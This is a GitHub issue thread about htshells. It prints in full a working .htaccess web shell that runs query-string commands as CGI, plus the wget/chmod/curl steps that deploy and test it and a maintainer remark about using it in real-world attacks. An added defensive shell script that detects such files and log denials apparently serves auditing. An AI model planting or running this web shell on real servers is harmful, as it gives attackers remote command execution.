Comments (4)
htshells should work on Apache2. Did you uncomment the line per the comments in the file?
from htshells.
To set this up:
- I installed an Ubuntu 20.04 (server).
```
apt-get update
apt-get dist-upgrade
apt-get install apache2
a2enmod cgi
apache2ctl restart
```
- confirm we're in working order:
```
ubuntu@ubuntu2004:~$ curl --silent 127.0.0.1 | head
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2016-11-16
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
```
```
wget -O /var/www/html/.htaccess https://raw.githubusercontent.com/wireghoul/htshells/master/shell/mod_cgi.shell.bash.htaccess
chmod +x /var/www/html/.htaccess
sed -i 's/# Require all granted/ Require all granted/' /var/www/html/.htaccess
```
- Double check we're all good:
```
ubuntu@ubuntu2004:~$ cat /var/www/html/.htaccess
#!/bin/sh
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# IMPORTANT: Needs chmod +x to run
# Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a)
# Big shout out to the rosetta code website which provided the example below!
# This is considered a line spanning comment in apache and not by shell
#winning \
echo -en "Content-Type: text/plain\r\n\r\n";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "\$ $cmd";$cmd 2>&1;exit
# The exit ensures we never reach the following lines which would break the shell parser
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
 Require all granted
Order allow,deny
Allow from all
</Files>
# Enable CGI
Options +ExecCGI
#Make apache treat .htaccess as a cgi file
AddHandler cgi-script .htaccess
```
```
apache2ctl restart
```
(just to be certain everything is correct)
- Give it a go:
```
curl --silent "http://127.0.0.1/.htaccess?whoami" | head
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
```
- Logs
```
ubuntu@ubuntu2004:~$ tail -n 1 /var/log/apache2/error.log
[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess
```
All changes to server are listed here. However, for sake of consistency, here's the only enabled site config:
```
<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```
Thus, it seems the default config is blocking this in some way shape or form. I spent some time trying to debug, but didn't make any progress.
from htshells.
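From the defender's side, the artefact in the post above (an executable `.htaccess` carrying `Options +ExecCGI` / `AddHandler cgi-script` and the `AH01630` denial it produced in error.log) is exactly what a web-root audit should catch. The helper below is an added example, not part of htshells or the thread; it assumes POSIX sh with `find` and `grep`, and takes the DocumentRoot and optionally the error log path as arguments.

```shell
#!/bin/sh
# Added audit helper, not part of htshells. Assumes POSIX sh, find, grep.
# Flags .htaccess files that carry CGI-handler directives (the markers the
# file quoted in this thread uses) and extracts authz_core AH01630 denials
# for dot-files from an Apache error log so repeated probes stand out.

# Prints "<file>: <reasons>" and returns 0 when FILE looks CGI-enabled,
# returns 1 (prints nothing) otherwise.
htaccess_is_suspicious() {
    f="$1"
    [ -f "$f" ] || return 1
    reasons=""
    [ -x "$f" ] && reasons="$reasons exec-bit"
    head -c 2 "$f" | grep -q '^#!' && reasons="$reasons shebang"
    grep -qiE '^[[:space:]]*AddHandler[[:space:]]+cgi-script' "$f" && reasons="$reasons AddHandler-cgi-script"
    grep -qiE '^[[:space:]]*Options[[:space:]].*ExecCGI' "$f" && reasons="$reasons ExecCGI"
    grep -qiE '^[[:space:]]*Require[[:space:]]+all[[:space:]]+granted' "$f" && reasons="$reasons Require-all-granted"
    [ -n "$reasons" ] || return 1
    echo "$f:$reasons"
}

# Walks a DocumentRoot and reports every suspicious .htaccess found.
audit_docroot() {
    find "$1" -type f -name '.htaccess' 2>/dev/null | while read -r f; do
        htaccess_is_suspicious "$f" || true
    done
}

# Error-log lines where Apache's default deny rule blocked a dot-file,
# i.e. the AH01630 line quoted in the post; a burst of these is a probe signal.
denied_dotfile_hits() {
    grep -E 'AH01630: client denied by server configuration: [^ ]*/\.ht' "$1"
}

denied_dotfile_count() {
    denied_dotfile_hits "$1" | wc -l | tr -d ' '
}

# Usage: sh audit_htaccess.sh /var/www/html [/var/log/apache2/error.log]
if [ "$#" -ge 1 ]; then
    audit_docroot "$1"
fi
if [ "$#" -ge 2 ]; then
    printf 'denied dot-file requests in %s: %s\n' "$2" "$(denied_dotfile_count "$2")"
    denied_dotfile_hits "$2"
fi
```

Run it from cron or a configuration-management check; a clean site should print nothing for the DocumentRoot pass and a count of 0 for the log pass.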
any updates?
from htshells.
Sorry, there is no unpaid tech support for this project. Between this talk (https://youtu.be/p1aCTBZrIOw) the Apache documentation and your server logs you should be able to figure it out.
In most real world scenarios I've seen you usually only get one shot at generating the correct htaccess file for the server config in use. Or you can write a specific exploit for a known configuration. Tbh I'd rather not see htshells as a payload function in metasploit, as I fear that will just generate a large number of support requests from users who had their exploit fail and use GitHub to demand answers.
from htshells.